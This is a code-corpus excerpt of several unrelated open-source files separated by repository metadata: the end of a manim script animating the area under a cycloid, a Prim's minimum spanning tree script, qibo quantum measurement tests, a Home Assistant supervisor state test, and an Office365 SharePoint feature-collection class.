line_PP_init.add_updater(lambda l: l.become(DashedLine(start_new + get_P_init(get_t()), start_new + get_P(get_t()), stroke_width=2.5, color=BLUE)))
circle_new.add_updater(lambda c: c.move_to(dot_O))
g1 = VGroup(dot_P, dot_P_2, dot_O, line_r, line_r_2, line_PP2)
self.play(ShowCreation(ground_line_new))
self.play(ShowCreation(curve_new), FadeIn(circle_new))
self.add(circle_init, dot_O_init)
self.wait(0.2)
self.play(FadeIn(dot_O))
self.play(FadeIn(dot_P), FadeIn(line_r))
self.wait(0.4)
self.play(ShowCreation(dot_O_2), run_time=0.4)
dash_line = DashedLine(init_O, dot_O_2.get_center(), color=YELLOW, stroke_width=2.5, plot_depth=0.5)
self.play(ShowCreation(dash_line))
self.wait(0.4)
self.play(dot_O.shift, r * PI * RIGHT, run_time=2.5)
self.play(FadeIn(dot_P_init), ShowCreation(line_r_init), ShowCreation(line_PP_init))
self.add(dot_O_2, dot_P_2, line_r_2, line_PP2, circle_mid)
self.wait(0.75)
self.play(dot_O.shift, -0.36 * r * PI * RIGHT, rate_func=linear, run_time=3.6)
g2 = g1.copy().suspend_updating()
self.add(g2)
self.play(dot_O.shift, -0.28 * r * PI * RIGHT, rate_func=linear, run_time=2.8)
angle_1 = Angle(dot_O.get_center(), dot_O_2.get_center(), g2[1].get_center(), radius=0.5, color=YELLOW)
angle_2 = Angle(dot_O.get_center(), dot_O_2.get_center(), g1[1].get_center(), radius=0.5, color=YELLOW)
angle_3 = Angle(dot_O_init.get_center(), g2[2].get_center(), g2[0].get_center(), radius=0.5, color=YELLOW)
angle_4 = Angle(dot_O_init.get_center(), dot_O.get_center(), g1[0].get_center(), radius=0.5, color=YELLOW)
self.play(ShowCreation(angle_1), ShowCreation(angle_2))
self.play(ShowCreation(angle_3), ShowCreation(angle_4))
self.wait(0.8)
line_down = Line(line_PP2.get_start(), line_PP2.get_end(), color=BLUE, stroke_opacity=0.5, stroke_width=16)
line_up = Line(g2[5].get_start(), g2[5].get_end(), color=BLUE, stroke_opacity=0.5, stroke_width=16)
# line_down.set_plot_depth(2), line_up.set_plot_depth(2)
# line_down.suspend_updating(), line_up.suspend_updating()
brace = Brace(dash_line, DOWN, color=RED)
tex = brace.get_tex('\\pi r').set_color(RED)
tex.scale(1.5) # .shift(UP * 0.05)
self.play(ShowCreation(line_down))
self.play(ShowCreation(line_up))
self.wait(0.4)
self.play(line_down.shift, dot_O.get_center() - dot_P.get_center(), rate_func=linear, run_time=1.2)
self.wait(0.4)
self.play(line_up.shift, init_O - g2[0].get_center(), rate_func=linear, run_time=1.2)
self.wait(0.6)
self.play(FadeInFromDown(brace))
self.play(Write(tex))
self.wait(0.8)
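# On-screen caption (kept in Chinese for rendering): "the total length of the
# upper and lower blue segments at equal distances from the yellow dashed
# line is constant (πr)".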
explain_text = Text('距黄虚线相等的上下两\n'
'蓝色线的总和固定(πr)', font='思源黑体 Bold')
t2c = {'黄虚线': YELLOW, '蓝色线': BLUE, 'πr':RED}
explain_text.set_color_by_t2c(t2c)
explain_text.scale(0.5).next_to(dot_O_2, RIGHT * 2.4)
self.play(Write(explain_text), run_time=3)
self.play(ShowCreation(SurroundingRectangle(explain_text)), run_time=1.2)
self.wait()
self.play(ReplacementTransform(rects_81, rects_7_new), ReplacementTransform(rects_y_81, rects_y_7_new))
for rect, rect_y in zip(rects_7_new, rects_y_7_new): self.play(rect.align_to, rects_7, LEFT, rect_y.align_to, rects_y_7, RIGHT, run_time=0.4)
self.wait(0.8)
self.play(FadeOut(rects_7_new), FadeOut(rects_y_7_new), FadeIn(rects_17_new), FadeIn(rects_y_17_new), rate_func=linear, run_time=0.9)
for rect, rect_y in zip(rects_17_new, rects_y_17_new): self.play(rect.align_to, rects_17, LEFT, rect_y.align_to, rects_y_17, RIGHT, run_time=0.32)
self.wait(0.8)
self.play(FadeOut(rects_17_new), FadeOut(rects_y_17_new), FadeIn(rects_37_new), FadeIn(rects_y_37_new), rate_func=linear, run_time=0.9)
for rect, rect_y in zip(rects_37_new, rects_y_37_new): self.play(rect.align_to, rects_37, LEFT, rect_y.align_to, rects_y_37, RIGHT, run_time=0.2)
self.wait(1.)
for rect, rect_y in zip(rects_81_new, rects_y_81_new):
rect.align_to(rects_81_new, LEFT)
rect_y.align_to(rects_y_81_new, RIGHT)
self.play(ReplacementTransform(rects_37_new, rects_81_new), ReplacementTransform(rects_y_37_new, rects_y_81_new), run_time=1.2)
self.wait(0.4)
self.play(FadeOut(rects_81_new), FadeIn(area_b), FadeOut(rects_y_81_new), FadeIn(area_y), rate_func=linear, run_time=1.25)
self.wait(1.2)
self.play(area_y.shift, PI * r * LEFT, run_time=1.2)
self.wait(1)
tex2color = {'S_{\\text{蓝}}': BLUE, 'S_{\\text{黄}}': YELLOW, 'S_{\\text{红}}': RED,
'2r': RED, '\\pi r': RED, '2\\pi r^2': RED, '3\\pi r^2': PINK, 'S': PINK}
formula_02 = TexMobject('S_{\\text{蓝}}', '+ ', 'S_{\\text{黄}}', '=', '2r', '\\times', '\\pi r', plot_depth=5)
# formula_02.set_color_by_tex_to_color_map(tex2color)
formula_02[0].set_color(BLUE), formula_02[2].set_color(YELLOW), formula_02[4].set_color(RED), formula_02[6].set_color(RED),
formula_02.scale(1.5).next_to(area_y, RIGHT * 2.5)
formula_02_2 = TexMobject('S_{\\text{蓝}}', '+ ', 'S_{\\text{黄}}', '=', '2\\pi r^2', plot_depth=5)
# formula_02_2.set_color_by_tex_to_color_map(tex2color)
formula_02_2[0].set_color(BLUE), formula_02_2[2].set_color(YELLOW), formula_02_2[4].set_color(RED)
formula_02_2.scale(1.5).next_to(area_y, RIGHT * 2.5)
formula_03 = TexMobject('\\therefore', 'S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{黄}}', '+', 'S_{\\text{红}}', '=', '3\\pi r^2', plot_depth=5)
# formula_03.set_color_by_tex_to_color_map(tex2color)
formula_03[1].set_color(PINK), formula_03[3].set_color(BLUE), formula_03[5].set_color(YELLOW), formula_03[7].set_color(RED), formula_03[9].set_color(PINK)
formula_03.scale(1.6).to_corner(LEFT * 2.5 + UP * 8.75)
self.play(Write(formula_02), run_time=1.5)
self.wait(0.8)
self.play(ReplacementTransform(formula_02, formula_02_2), run_time=1.5)
self.wait(0.4)
self.play(ShowCreation(SurroundingRectangle(formula_02_2, plot_depth=3)), run_time=1.2)
self.wait(1.5)
mask_rect = Rectangle(color=BLACK, fill_color=BLACK, fill_opacity=1, plot_depth=3).scale([10, 4, 1]).align_to(ORIGIN, UP)
self.play(FadeIn(mask_rect), run_time=1.2)
self.wait()
self.play(Write(formula_03[0:8]), run_time=2.5)
self.wait(0.2)
self.play(Write(formula_03[8:10]))
self.wait(4)
def create_rects(self, num=7, r=1, start_point=ORIGIN, color=BLUE, stroke_width=0.5):
x = lambda t: r * (t - np.sin(t))
# y = lambda t: r * (1 - np.cos(t))
x_c = lambda t: r * PI - r * np.sin(t) + 1e-3
t = lambda y: np.arccos(1 - y/r)
rects = VGroup()
h = 2 * r / num
s = start_point
for i in range(num):
h_i = h * i
x_l, x_r = x(t(h_i)), x_c(t(h_i))
rect_i = Polygon(s + x_l * RIGHT + h_i * UP, s + x_r * RIGHT + h_i * UP,
s + x_r * RIGHT + (h_i + h) * UP, s + x_l * RIGHT + (h_i + h) * UP,
fill_color=color, fill_opacity=0.8, stroke_width=stroke_width, stroke_color=BLACK)
rects.add(rect_i)
return rects
class PatchText(Scene):
'''The animation after the Area_divide_into_rect scene has a small glitch; rather than re-render everything, this scene re-renders just the final formula so it can be patched in during editing. (Not named Text, to avoid shadowing manim's Text mobject used above.)'''
def construct(self):
formula_03 = TexMobject('\\therefore', 'S', '=', 'S_{\\text{蓝}}', '+', 'S_{\\text{黄}}', '+', 'S_{\\text{红}}', '=', '3\\pi r^2', plot_depth=5)
# formula_03.set_color_by_tex_to_color_map(tex2color)
formula_03[1].set_color(PINK), formula_03[3].set_color(BLUE), formula_03[5].set_color(YELLOW), formula_03[7].set_color(RED), formula_03[9].set_color(PINK)
formula_03.scale(1.6).to_corner(LEFT * 2.5 + UP * 8.75)
self.play(Write(formula_03[0:8]), run_time=2.5)
self.wait(0.2)
self.play(Write(formula_03[8:10]))
self.wait(4)
class Ending(Scene):
"""用来骗三连的结尾"""
def construct(self):
r = 1.45
start_point = DOWN * r + PI * r * LEFT
init_O = start_point + r * UP
curve = ParametricFunction(lambda t: start_point + r * np.array([t-np.sin(t), 1-np.cos(t), 0]),
t_min=0, t_max=PI * 2, stroke_width=2)
# get_t = lambda : (dot_O.get_center()[0] - init_O[0]) / r
get_P = lambda t: np.array([t - np.sin(t), 1 - np.cos(t), 0]) * r
area = Polygon(*[init_O + r * DOWN + get_P(t) for t in np.linspace(0, TAU, 100)],
fill_color=YELLOW, fill_opacity=0.95, stroke_width=0)
circle_01 = Circle(radius=r-0.1, stroke_width=20, color=PINK, fill_color=PINK, fill_opacity=1).move_to(LEFT * 2.75 * r)
circle_02 = Circle(radius=r-0.1, stroke_width=20, color=BLUE, fill_color=BLUE, fill_opacity=1).move_to(LEFT * 0)
circle_03 = Circle(radius=r-0.1, stroke_width=20, color=ORANGE, fill_color=ORANGE, fill_opacity=1).move_to(RIGHT * 2.75 * r)
circle_11, circle_12, circle_13 = circle_01.copy().set_fill(opacity=0), circle_02.copy().set_fill(opacity=0), circle_03.copy().set_fill(opacity=0)
path = 'my_manim_projects\\my_projects\\resource\\svg_files\\'
good = SVGMobject(path + 'good.svg', color=PINK).set_width(0.7 * 2 * r).move_to(circle_01).shift(UR * 0.06)
coin = SVGMobject(path + 'coin.svg', color=BLUE).set_height(0.7 * 2 * r).move_to(circle_02)
favo = SVGMobject(path + 'favo.svg', color=ORANGE).set_height(0.7 * 2 * r).move_to(circle_03).shift(UR * 0.05)
self.play(FadeInFromLarge(area), run_time=0.8)
# self.play(WiggleOutThenIn(area), run_time=0.8)
self.wait(0.8)
self.play(ReplacementTransform(area, VGroup(circle_01, circle_02, circle_03)), run_time=0.9)
self.wait(2.5)
self.add(circle_11, circle_12, circle_13)
self.play(ReplacementTransform(circle_01, good), ReplacementTransform(circle_02, coin),
ReplacementTransform(circle_03, favo), run_time=2)
self.wait()
self.play(WiggleOutThenIn(good), WiggleOutThenIn(coin), WiggleOutThenIn(favo), run_time=2)
self.wait(5)
|
2c1b2271e8643767e3038c06e92b0a7b1f0f2839
|
2753608f87a1e8fa312feced7af20917ea9cc004
|
/Graphs/Prims Algorithm/Prims/Prims.py
|
56efa901a559afbf6dd56c47cc9da523c1f5dd9f
|
[
"MIT"
] |
permissive
|
VAR-solutions/Algorithms
|
76faed6515367b6f27638b910dbc07f340fae56f
|
4ad6773e9675ef35aa858ca3969be5ddf6e3daea
|
refs/heads/dev
| 2023-08-15T11:37:26.048316
| 2021-08-03T07:00:28
| 2021-08-03T07:00:28
| 151,157,582
| 794
| 1,249
|
MIT
| 2023-07-29T00:28:36
| 2018-10-01T20:50:24
|
C++
|
UTF-8
|
Python
| false
| false
| 1,628
|
py
|
Prims.py
|
import random
import math
import numpy as np
# Prim's Minimum Spanning Tree Algorithm
def primsAlgo(e,c,n):
sel_edge = ()
mincost = 0
near = [0 for x in range(n)]
t = [[0 for x in range(2)] for y in range(n-1)]
print('Initial Minimum Spanning Tree:\n', np.matrix(t))
values = np.array(c)
index = np.argmin(values)
minedge = [index//n, index%n]
sel_edge = minedge
mincost += c[sel_edge[0]][sel_edge[1]]
# Record the globally minimum-cost edge as the first edge of the MST
t[0][0],t[0][1] = sel_edge[0],sel_edge[1]
for l in range(0,n):
if(c[l][sel_edge[0]] < c[l][sel_edge[1]]):
near[l] = sel_edge[0]
else:
near[l] = sel_edge[1]
near[sel_edge[0]],near[sel_edge[1]] = -1,-1
minm = math.inf
for i in range(1,n-1):
for j in range(n):
if(near[j] != -1):
if(c[j][near[j]] < minm):
minm = c[j][near[j]]
sel_edge[0] = j
sel_edge[1] = near[j]
minm = math.inf
t[i][0],t[i][1] = sel_edge[0],sel_edge[1]
mincost += c[sel_edge[0]][sel_edge[1]]
near[sel_edge[0]] = -1
for k in range(n):
if(near[k] != -1 and (c[k][near[k]] > c[k][sel_edge[0]])):
near[k] = sel_edge[0]
print('Resultant MST: \n', np.matrix(t))
return mincost
n = random.randint(5,7)
print('Number of vertices:', n)
max_int = math.inf
e = [[0 for x in range(n)] for y in range(n)]
c = [[max_int for x in range(n)] for y in range(n)]
for i in range(n):
for j in range(n):
if(i < j):
e[i][j]=1
c[i][j]=float(random.randint(10,50))
else:
e[i][j]=e[j][i]
c[i][j]=c[j][i]
print('Edge Adjacency Matrix: \n', np.matrix(e))
print('Cost Adjacency Matrix: \n',np.matrix(c))
print ('Cost of MST: ', primsAlgo(e,c,n))
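# For comparison, a heap-based Prim's sketch (an alternative formulation;
# `prims_heap` is illustrative and not part of the original exercise). For a
# connected graph it should report the same MST cost as primsAlgo above,
# since the minimum spanning tree weight is unique even when ties exist.
import heapq

def prims_heap(cost, n_vertices, start=0):
    visited = [False] * n_vertices
    heap = [(0.0, start)]  # (cheapest known edge weight into vertex, vertex)
    total = 0.0
    while heap:
        w, v = heapq.heappop(heap)
        if visited[v]:
            continue
        visited[v] = True
        total += w
        for nxt in range(n_vertices):
            if not visited[nxt] and cost[v][nxt] != math.inf:
                heapq.heappush(heap, (cost[v][nxt], nxt))
    return total

print('Cost of MST (heap-based cross-check): ', prims_heap(c, n))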
|
2a9c2af9e8adaf898f8a46b2cf393d27aab42dda
|
e9420977fc5540967c6602520272a5b73bb57e98
|
/tests/test_measurements.py
|
3b0bcea4d5afde7e6ca1c28b1bff4f86f3781792
|
[
"Apache-2.0"
] |
permissive
|
qiboteam/qibo
|
2c8d4820ca4e7a6ac315b44338b0cd072b51e857
|
76ad26f356a1831553818a3082cc669f042945b2
|
refs/heads/master
| 2023-09-05T07:39:50.695080
| 2023-08-24T16:47:30
| 2023-08-24T16:47:30
| 241,307,936
| 150
| 41
|
Apache-2.0
| 2023-09-14T10:09:25
| 2020-02-18T08:21:10
|
Python
|
UTF-8
|
Python
| false
| false
| 13,874
|
py
|
test_measurements.py
|
"""Test circuit result measurements and measurement gate and as part of circuit."""
import numpy as np
import pytest
from qibo import gates, models
def assert_result(
backend,
result,
decimal_samples=None,
binary_samples=None,
decimal_frequencies=None,
binary_frequencies=None,
):
if decimal_frequencies is not None:
assert result.frequencies(False) == decimal_frequencies
if binary_frequencies is not None:
assert result.frequencies(True) == binary_frequencies
if decimal_samples is not None:
backend.assert_allclose(result.samples(False), decimal_samples)
if binary_samples is not None:
backend.assert_allclose(result.samples(True), binary_samples)
def assert_dicts_equal(backend, d1, d2):
assert d1.keys() == d2.keys()
for k, v in d1.items():
if isinstance(v, dict):
assert v == d2[k]
else:
backend.assert_allclose(v, d2[k])
def assert_register_result(
backend,
result,
decimal_samples=None,
binary_samples=None,
decimal_frequencies=None,
binary_frequencies=None,
):
if decimal_samples:
register_result = result.samples(binary=False, registers=True)
assert_dicts_equal(backend, register_result, decimal_samples)
if binary_samples:
register_result = result.samples(binary=True, registers=True)
assert_dicts_equal(backend, register_result, binary_samples)
if decimal_frequencies:
register_result = result.frequencies(binary=False, registers=True)
assert_dicts_equal(backend, register_result, decimal_frequencies)
if binary_frequencies:
register_result = result.frequencies(binary=True, registers=True)
assert_dicts_equal(backend, register_result, binary_frequencies)
@pytest.mark.parametrize("n", [0, 1])
@pytest.mark.parametrize("nshots", [100, 1000000])
def test_measurement_gate(backend, n, nshots):
c = models.Circuit(2)
if n:
c.add(gates.X(1))
c.add(gates.M(1))
result = backend.execute_circuit(c, nshots=nshots)
assert_result(
backend,
result,
n * np.ones(nshots),
n * np.ones((nshots, 1)),
{n: nshots},
{str(n): nshots},
)
def test_multiple_qubit_measurement_gate(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0, 1))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
2 * np.ones((100,)),
target_binary_samples,
{2: 100},
{"10": 100},
)
def test_measurement_gate_errors(backend):
gate = gates.M(0)
# attempting to use `controlled_by`
with pytest.raises(NotImplementedError):
gate.controlled_by(1)
# attempting to construct unitary
with pytest.raises(NotImplementedError):
matrix = gate.matrix(backend)
def test_measurement_circuit(backend, accelerators):
c = models.Circuit(4, accelerators)
c.add(gates.X(0))
c.add(gates.M(0))
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend, result, np.ones((100,)), np.ones((100, 1)), {1: 100}, {"1": 100}
)
@pytest.mark.parametrize("registers", [False, True])
def test_measurement_qubit_order_simple(backend, registers):
c = models.Circuit(2)
c.add(gates.X(0))
if registers:
c.add(gates.M(1, 0))
else:
c.add(gates.M(1))
c.add(gates.M(0))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 1] = 1
assert_result(
backend, result, np.ones(100), target_binary_samples, {1: 100}, {"01": 100}
)
@pytest.mark.parametrize("nshots", [100, 1000000])
def test_measurement_qubit_order(backend, accelerators, nshots):
c = models.Circuit(6, accelerators)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.M(1, 5, 2, 0))
result = backend.execute_circuit(c, nshots=nshots)
target_binary_samples = np.zeros((nshots, 4))
target_binary_samples[:, 0] = 1
target_binary_samples[:, 3] = 1
assert_result(
backend,
result,
9 * np.ones(nshots),
target_binary_samples,
{9: nshots},
{"1001": nshots},
)
def test_multiple_measurement_gates_circuit(backend):
c = models.Circuit(4)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 1))
c.add(gates.M(2))
c.add(gates.X(3))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.ones((100, 3))
target_binary_samples[:, 0] = 0
assert_result(
backend, result, 3 * np.ones(100), target_binary_samples, {3: 100}, {"011": 100}
)
def test_circuit_with_unmeasured_qubits(backend, accelerators):
c = models.Circuit(5, accelerators)
c.add(gates.X(4))
c.add(gates.X(2))
c.add(gates.M(0, 2))
c.add(gates.X(3))
c.add(gates.M(1, 4))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 4))
target_binary_samples[:, 1] = 1
target_binary_samples[:, 3] = 1
assert_result(
backend,
result,
5 * np.ones(100),
target_binary_samples,
{5: 100},
{"0101": 100},
)
def test_circuit_addition_with_measurements(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.X(1))
meas_c = models.Circuit(2)
c.add(gates.M(0, 1))
c += meas_c
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend,
result,
3 * np.ones(100),
np.ones((100, 2)),
{3: 100},
{"11": 100},
)
def test_circuit_addition_with_measurements_in_both_circuits(backend, accelerators):
c1 = models.Circuit(4, accelerators)
c1.add(gates.X(0))
c1.add(gates.X(1))
c1.add(gates.M(1, register_name="a"))
c2 = models.Circuit(4, accelerators)
c2.add(gates.X(0))
c2.add(gates.M(0, register_name="b"))
c = c1 + c2
result = backend.execute_circuit(c, nshots=100)
assert_result(
backend,
result,
binary_frequencies={"10": 100},
)
def test_circuit_copy_with_measurements(backend, accelerators):
c1 = models.Circuit(6, accelerators)
c1.add([gates.X(0), gates.X(1), gates.X(3)])
c1.add(gates.M(5, 1, 3, register_name="a"))
c1.add(gates.M(2, 0, register_name="b"))
c2 = c1.copy(deep=True)
r1 = backend.execute_circuit(c1, nshots=100)
r2 = backend.execute_circuit(c2, nshots=100)
backend.assert_allclose(r1.samples(), r2.samples())
rg1 = r1.frequencies(registers=True)
rg2 = r2.frequencies(registers=True)
assert rg1.keys() == rg2.keys()
for k in rg1.keys():
assert rg1[k] == rg2[k]
def test_measurement_compiled_circuit(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0))
c.add(gates.M(1))
c.compile(backend)
result = c(nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
2 * np.ones((100,)),
target_binary_samples,
{2: 100},
{"10": 100},
)
target_state = np.zeros_like(c.final_state)
target_state[2] = 1
backend.assert_allclose(c.final_state, target_state)
def test_final_state(backend, accelerators):
"""Check that final state is logged correctly when using measurements."""
c = models.Circuit(4, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 1))
c.add(gates.M(2))
c.add(gates.X(3))
result = backend.execute_circuit(c, nshots=100)
c = models.Circuit(4, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.X(3))
target_state = backend.execute_circuit(c)
backend.assert_allclose(c.final_state, target_state)
def test_measurement_gate_bitflip_errors():
gate = gates.M(0, 1, p0=2 * [0.1])
with pytest.raises(ValueError):
gate = gates.M(0, 1, p0=4 * [0.1])
with pytest.raises(KeyError):
gate = gates.M(0, 1, p0={0: 0.1, 2: 0.2})
with pytest.raises(TypeError):
gate = gates.M(0, 1, p0="test")
def test_register_measurements(backend):
c = models.Circuit(3)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.M(0, 2))
c.add(gates.M(1))
result = backend.execute_circuit(c, nshots=100)
decimal_samples = {"register0": 2 * np.ones((100,)), "register1": np.ones((100,))}
binary_samples = {"register0": np.zeros((100, 2)), "register1": np.ones((100, 1))}
binary_samples["register0"][:, 0] = 1
decimal_frequencies = {"register0": {2: 100}, "register1": {1: 100}}
binary_frequencies = {"register0": {"10": 100}, "register1": {"1": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_register_name_error(backend):
c = models.Circuit(2)
c.add(gates.X(0))
c.add(gates.M(0, register_name="a"))
with pytest.raises(KeyError):
c.add(gates.M(1, register_name="a"))
def test_registers_with_same_name_error(backend):
"""Check that circuits that contain registers with the same name cannot be added."""
c1 = models.Circuit(2)
c1.add(gates.H(0))
c1.add(gates.M(0, register_name="a"))
c2 = models.Circuit(2)
c2.add(gates.H(1))
c2.add(gates.M(1, register_name="a"))
with pytest.raises(KeyError):
c = c1 + c2
def test_measurement_qubit_order_multiple_registers(backend, accelerators):
c = models.Circuit(6, accelerators)
c.add(gates.X(0))
c.add(gates.X(1))
c.add(gates.X(3))
c.add(gates.M(5, 1, 3, register_name="a"))
c.add(gates.M(2, 0, register_name="b"))
result = backend.execute_circuit(c, nshots=100)
# Check full result
target_binary_samples = np.zeros((100, 5))
target_binary_samples[:, 1] = 1
target_binary_samples[:, 2] = 1
target_binary_samples[:, 4] = 1
assert_result(
backend,
result,
13 * np.ones((100,)),
target_binary_samples,
{13: 100},
{"01101": 100},
)
decimal_samples = {"a": 3 * np.ones((100,)), "b": np.ones((100,))}
binary_samples = {"a": np.zeros((100, 3)), "b": np.zeros((100, 2))}
binary_samples["a"][:, 1] = 1
binary_samples["a"][:, 2] = 1
binary_samples["b"][:, 1] = 1
decimal_frequencies = {"a": {3: 100}, "b": {1: 100}}
binary_frequencies = {"a": {"011": 100}, "b": {"01": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_registers_in_circuit_with_unmeasured_qubits(backend, accelerators):
"""Check that register measurements are unaffected by unmeasured qubits."""
c = models.Circuit(5, accelerators)
c.add(gates.X(1))
c.add(gates.X(2))
c.add(gates.M(0, 2, register_name="A"))
c.add(gates.X(3))
c.add(gates.M(1, 4, register_name="B"))
result = backend.execute_circuit(c, nshots=100)
decimal_samples = {"A": np.ones((100,)), "B": 2 * np.ones((100,))}
binary_samples = {"A": np.zeros((100, 2)), "B": np.zeros((100, 2))}
binary_samples["A"][:, 1] = 1
binary_samples["B"][:, 0] = 1
decimal_frequencies = {"A": {1: 100}, "B": {2: 100}}
binary_frequencies = {"A": {"01": 100}, "B": {"10": 100}}
assert_register_result(
backend,
result,
decimal_samples,
binary_samples,
decimal_frequencies,
binary_frequencies,
)
def test_measurement_density_matrix(backend):
c = models.Circuit(2, density_matrix=True)
c.add(gates.X(0))
c.add(gates.M(0, 1))
result = backend.execute_circuit(c, nshots=100)
target_binary_samples = np.zeros((100, 2))
target_binary_samples[:, 0] = 1
assert_result(
backend,
result,
decimal_samples=2 * np.ones((100,)),
binary_samples=target_binary_samples,
decimal_frequencies={2: 100},
binary_frequencies={"10": 100},
)
def test_measurement_result_vs_circuit_result(backend, accelerators):
c = models.Circuit(6, accelerators)
c.add([gates.X(0), gates.X(1), gates.X(3)])
ma = c.add(gates.M(5, 1, 3, register_name="a"))
mb = c.add(gates.M(2, 0, register_name="b"))
result = backend.execute_circuit(c, nshots=100)
ma_freq = ma.frequencies()
mb_freq = mb.frequencies()
frequencies = result.frequencies(registers=True)
assert ma_freq == frequencies.get("a")
assert mb_freq == frequencies.get("b")
@pytest.mark.parametrize("nqubits", [1, 4])
@pytest.mark.parametrize("outcome", [0, 1])
def test_measurement_basis(backend, nqubits, outcome):
c = models.Circuit(nqubits)
if outcome:
c.add(gates.X(q) for q in range(nqubits))
c.add(gates.H(q) for q in range(nqubits))
c.add(gates.M(*range(nqubits), basis=gates.X))
result = c(nshots=100)
assert result.frequencies() == {nqubits * str(outcome): 100}
def test_measurement_basis_list(backend):
c = models.Circuit(4)
c.add(gates.H(0))
c.add(gates.X(2))
c.add(gates.H(2))
c.add(gates.X(3))
c.add(gates.M(0, 1, 2, 3, basis=[gates.X, gates.Z, gates.X, gates.Z]))
result = c(nshots=100)
assert result.frequencies() == {"0011": 100}
print(c.draw())
assert (
c.draw()
== """q0: ─H─H───M─
q1: ───────M─
q2: ─X─H─H─M─
q3: ─X─────M─"""
)
def test_measurement_basis_list_error(backend):
c = models.Circuit(4)
with pytest.raises(ValueError):
c.add(gates.M(0, 1, 2, 3, basis=[gates.X, gates.Z, gates.X]))
|
82ef5d5f3f177cf663ef075eaa9e689d442639cc
|
e90bf4b372da78ceec15282d060b48d18ba8d4e9
|
/tests/test_core.py
|
8e25bac68d0f359168091bb6963a2c55404d12a4
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/supervisor
|
67f2e1755ff5fbf7cf2084351e1c32c6995274e0
|
4838b280adafed0997f32e021274b531178386cd
|
refs/heads/main
| 2023-08-31T22:51:25.949277
| 2023-08-31T08:01:42
| 2023-08-31T08:01:42
| 84,926,758
| 928
| 477
|
Apache-2.0
| 2023-09-14T17:11:27
| 2017-03-14T08:54:15
|
Python
|
UTF-8
|
Python
| false
| false
| 428
|
py
|
test_core.py
|
"""Testing handling with CoreState."""
from supervisor.const import CoreState
from supervisor.coresys import CoreSys
def test_write_state(run_dir, coresys: CoreSys):
"""Test write corestate to /run/supervisor."""
coresys.core.state = CoreState.RUNNING
assert run_dir.read_text() == CoreState.RUNNING.value
coresys.core.state = CoreState.SHUTDOWN
assert run_dir.read_text() == CoreState.SHUTDOWN.value
|
3f104056f614663d6f8439b75d490e39c4c88113
|
8ca19f1a31070738b376c0370c4bebf6b7efcb43
|
/office365/sharepoint/features/collection.py
|
b09731e105ae87c2c482cea609221fd456e26269
|
[
"MIT"
] |
permissive
|
vgrem/Office365-REST-Python-Client
|
2ef153d737c6ed5445ba1e446aeaec39c4ef4ed3
|
cbd245d1af8d69e013c469cfc2a9851f51c91417
|
refs/heads/master
| 2023-09-02T14:20:40.109462
| 2023-08-31T19:14:05
| 2023-08-31T19:14:05
| 51,305,798
| 1,006
| 326
|
MIT
| 2023-08-28T05:38:02
| 2016-02-08T15:24:51
|
Python
|
UTF-8
|
Python
| false
| false
| 2,319
|
py
|
collection.py
|
from office365.runtime.paths.service_operation import ServiceOperationPath
from office365.runtime.queries.service_operation import ServiceOperationQuery
from office365.sharepoint.base_entity_collection import BaseEntityCollection
from office365.sharepoint.features.feature import Feature
class FeatureCollection(BaseEntityCollection):
"""Represents a collection of Feature resources."""
def __init__(self, context, resource_path=None, parent=None):
super(FeatureCollection, self).__init__(context, Feature, resource_path, parent)
def add(self, feature_id, force, featdef_scope, verify_if_activated=False):
"""
Adds the feature to the collection of activated features and returns the added feature.
:param str feature_id: The feature identifier of the feature to be added.
:param bool force: Specifies whether to continue with the operation even if there are errors.
:param int featdef_scope: The feature scope for this feature.
:param bool verify_if_activated: Verify first whether the feature is already activated, to avoid a System.Data.DuplicateNameException
"""
return_type = Feature(self.context)
self.add_child(return_type)
def _create_query():
payload = {
"featureId": feature_id,
"force": force,
"featdefScope": featdef_scope
}
return ServiceOperationQuery(self, "Add", None, payload, None, return_type)
def _create_if_not_activated(f):
"""
:type f: Feature
"""
if not f.properties:
self.context.add_query(_create_query())
if verify_if_activated:
feature = self.get_by_id(feature_id)
self.context.load(feature, after_loaded=_create_if_not_activated)
else:
self.context.add_query(_create_query())
return return_type
def get_by_id(self, feature_id):
"""Returns the feature for the given feature identifier. Returns NULL if no feature is available for the given
feature identifier.
:param str feature_id: The feature identifier of the feature to be returned.
"""
return Feature(self.context, ServiceOperationPath("GetById", [feature_id], self.resource_path))
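# Example usage (a sketch; the client-context setup is assumed and the feature
# id below is hypothetical, not taken from this module):
#
#   from office365.sharepoint.client_context import ClientContext
#
#   ctx = ClientContext(site_url).with_credentials(credentials)
#   features = ctx.site.features
#   features.add("b50e3104-6812-424f-a011-cc90e6327318", force=True,
#                featdef_scope=0, verify_if_activated=True)
#   ctx.execute_query()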
|
24aa109ee9c6a49aa85c7f96e347ffb4dfd8d9e8
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/20_杂题/滴滴历届编程题真题/18_重复字符串重命名-counter.py
|
73f026b46d31bd2eeea48bc922578ecdb8f34d42
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
